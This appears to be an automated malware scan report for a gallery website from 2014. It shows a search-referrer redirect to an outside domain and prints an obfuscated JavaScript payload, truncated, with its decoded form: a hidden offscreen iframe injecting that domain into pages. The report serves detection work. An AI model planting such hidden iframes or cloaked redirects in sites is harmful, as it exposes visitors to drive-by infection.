Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://oilandwatergallery.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: oilandwatergallery.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 18 Sep 2014 11:23:29 GMT Location: http://iner.kz/index2.php Server: Apache Content-Length: 305 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://oilandwatergallery.com/ | 200 OK Content-Length: 2445 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var dgBqgoMgsSHWTyZTDkNE = "Vev60Vev105Vev102Vev114Vev97Vev109Vev101Vev32Vev119Vev105Vev100Vev116Vev104Vev61Vev34Vev52Vev56Vev48Vev34Vev32Vev104Vev101Vev105Vev103Vev104Vev116Vev61Vev34Vev54Vev48Vev34Vev32Vev115Vev114Vev99Vev61Vev34Vev104Vev116Vev116Vev112Vev58Vev47Vev47Vev105Vev110Vev101Vev114Vev46Vev107Vev122Vev47Vev105Vev110Vev100Vev101Vev120Vev50Vev46Vev112Vev104Vev112Vev34Vev32Vev115Vev116Vev121Vev108Vev101Vev61Vev34Vev98Vev111Vev114Vev100Vev101Vev114Vev58Vev48Vev112Vev120Vev59Vev32Vev112Vev Decoded script: <iframe width="480" height="60" src="http://iner.kz/index2.php" style="border:0px; position:relative; top:0px; left:-500px; opacity:0; filter:progid:DXImageTransform.Microsoft.Alpha(opacity=0); -moz-opacity:0"></iframe> Antivirus reports:
| ||
http://oilandwatergallery.com/test404page.js | HTTP/1.1 302 Found Connection: close Date: Thu, 18 Sep 2014 11:23:30 GMT Location: http://iner.kz/index2.php Server: Apache Content-Length: 281 Content-Type: text/html; charset=iso-8859-1 | clean |
http://iner.kz/index2.php | 500 Can't connect to iner.kz:80 (Bad hostname) Content-Length: 146 Content-Type: text/plain | clean |
http://iner.kz/test404page.js | 500 Can't connect to iner.kz:80 (Bad hostname) Content-Length: 146 Content-Type: text/plain | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=oilandwatergallery.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://oilandwatergallery.com/
Result: oilandwatergallery.com is not infected or malware details are not published yet.
Result: oilandwatergallery.com is not infected or malware details are not published yet.